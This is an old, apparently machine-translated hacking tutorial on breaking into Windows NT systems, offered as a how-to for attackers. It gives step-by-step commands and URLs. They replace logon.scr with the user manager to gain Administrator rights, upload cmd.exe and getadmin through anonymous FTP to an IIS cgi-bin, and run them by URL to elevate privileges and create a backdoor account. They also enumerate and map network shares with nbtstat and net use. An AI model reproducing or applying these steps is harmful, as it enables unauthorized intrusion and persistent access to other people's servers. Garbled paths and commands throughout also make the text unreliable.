Even the Administrator account is insecure.

If you have a common user account, you can easily obtain the NT Administrator Account:

One: First Change logon.scrunder c: winntsystem32to logon.old.pdf, then change usrmgr.exe to logon. scr, and then restart.

Logon. scr is a program loaded at startup. After the program is restarted, the User Manager does not display the previous logon Password Input Interface.

Then he has the permission to add himself to the Administrator group. Don't forget to change the file name back!

II:

The following technologies apply to websites that do not pay attention to NT network security. Some http technologies can also be used for reference by more advanced personnel. To access the NT Network, follow these steps:

Because the ftp of the iis server of nt generally allows anonymous accounts of anonymous to access, and some accounts of anonymous also have the upload permission, we need to attack such sites. If anonymous accounts are not allowed, the plaintext password may be transmitted online. You can use the tcpspy tool to intercept these passwords. We will not talk about these advanced technologies.

The setting of allowing anonymous accounts to log on to ftp also gives us the opportunity to break through the nt server. We use ftp to log on to an nt server, such as www.xxx.com (example name ):

Ftp www.xxx.com
Connected to www.xxx.com

Ntsvr2 exposes its netbios name. Therefore, in the background of iis, an iuser_ntsvr2 user Account must belong to the domain user group. This account will be used to obtain administrator privileges later.

User (www. xxx. comnone): anonymous
Password: Enter guest @ or guest

For administrators who lack network security knowledge, many users do not disable the guest account or set a password. Therefore, the guest account is a correct user account available, although it only belongs to the domain guest group.

In this case, we can enter the ftp of the nt server.

After entering the directory list, check the directory list and try key directories such as cd/c or wwwroot. If you are lucky enough to change the directory, you will be 80% sure.

Now, you can find the cgi-bin directory (or the scripts directory ). Copy the cmd.exe file under winntto cgi-bin, and upload getadmin and gasys. dll to cgi-bin.

Then enter: http://www.xxx.com/cgi-bin/getadmin.exe? Iusr_saturn

After more than 10 seconds, the screen is displayed:

Cgi error

In this case, it may be that you have upgraded iuser_ntsvr2 to administrator, that is, all users who access the website are administrators.

Add user:

Http://www.xxx.com/cgi-bin/cmd.exe? /C: winntsystem32et.exe user china news/add

In this way, a china user is created with the password news, and then:

Http://www.xxx.com/cgi-bin/getadmin.exe? China

Or

Http://www.xxx.com/scripts/tools/getadmin.exe? China

You can use the China account to log on to the corresponding directory. You can also use the corresponding account. exeto directly modify it. If there is no cmd.exe, you can upload it to the scripts/tools or cgi-bin directory.

3:

Scan with netbios Technology of nt

Nbtstat-a http://www.xxx.com/

Or,

Nbtstat-a http://www.xxx.com/

In this way, you can obtain the name of the shared resource in the domain;

Net view file:/www.xxx.com/

You can obtain the Shared Resource Name of the machine,

Net use f: file:/www.xxx.com/c

You can use f: to map its c disk,

Net use $ "> \ 111.111.111.111ipc $ content $ nbsp;" quot; "quot;/user:" quot; "quot;

4. unix tool:

Users of Windows 95 and 98 can use this TCP/IP tool to capture the package in the TCP/IP connection: packet95.exe must be downloaded before use.

Windump.exe packetnt.exe